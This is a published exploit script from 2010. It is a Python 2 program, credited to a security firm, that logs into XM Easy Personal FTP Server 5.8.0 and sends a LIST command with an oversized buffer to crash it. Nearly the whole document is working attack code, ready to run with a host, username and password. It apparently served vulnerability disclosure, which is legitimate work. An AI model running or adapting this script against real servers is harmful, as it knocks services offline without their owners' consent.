# Exploit Title: XM Easy Personal FTP Server LIST 
# Date: 4/17/2010
# Author: Jeremiah Talamantes
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP, SP2
# CVE : N/A
# Code : http://www.redteamsecure.com/assets/company/exploits/xmftp/xmexploit.php

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##                 XM Easy Personal FTP Server                 ##"
print "##                        Version 5.8.0                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# \n"

import socket
import sys

# Define the exploit's usage
def Usage():
    print ("Usage: xmexploit.py   \n")
    print ("\n\nCredit: Jeremiah Talamantes")
    print ("RedTeam Security, LLC : www.redteamsecure.com/labs\n")

# Buffer settings. Change as necessary
buffer= "./A" * 200000

def start(hostname, username, password):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 21))
    except:
        print ("Error: unable to connect to host")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] " + r
    #Send username to server
    sock.send("USER %s\r\n" %username)
    r=sock.recv(1024)
    # Send password to server
    sock.send("PASS %s\r\n" %password)
    r=sock.recv(1024)
    print "Sending the malicious chars..."
    # Send data to server
    sock.send("list %s\r\n" %buffer)
    sock.close()

if len(sys.argv) <> 4:
    Usage()
    sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    password=sys.argv[3]
    start(hostname,username,password)
    sys.exit(0)

# end